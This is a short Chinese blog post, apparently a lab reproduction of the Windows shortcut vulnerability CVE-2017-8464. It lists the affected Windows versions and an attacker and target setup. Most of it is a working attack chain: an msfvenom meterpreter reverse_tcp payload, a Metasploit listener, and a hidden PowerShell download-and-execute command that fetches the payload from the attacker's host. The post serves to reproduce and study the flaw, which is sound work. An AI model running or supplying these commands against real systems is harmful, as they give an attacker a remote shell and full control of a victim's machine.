CVE-2017-8464(powershell远程命令执行)漏洞复现

发布于 2019-12-23  832 次阅读


0x01 前言

CVE-2017-8464,当Windows系统在解析powershell快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。

0x02 影响版本

  • Windows 7
  • Windows 8.1
  • Windows RT 8.1
  • Windows 10
  • Windows Server 2008
  • Windows Server 2008 R2
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows Server 2016

0x03 实验环境

  • 靶 机: win10
  • 攻击机: Kali
    • ip:192.168.26.132

0x04 使用命令

#生成攻击文件<search.ps1>
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.26.132 lport=5555 -f  psh-reflection > /var/www/html/search.ps1
#开启Apache服务
service apache2 start
#开启监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp  //和攻击文件使用的payload一样
set lhost 192.168.26.132
set lport 5555
run
#创建快捷方式
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.26.132/search.ps1‘);test.ps1"

0x05 视频演示


我不懂世界到底在热闹些什么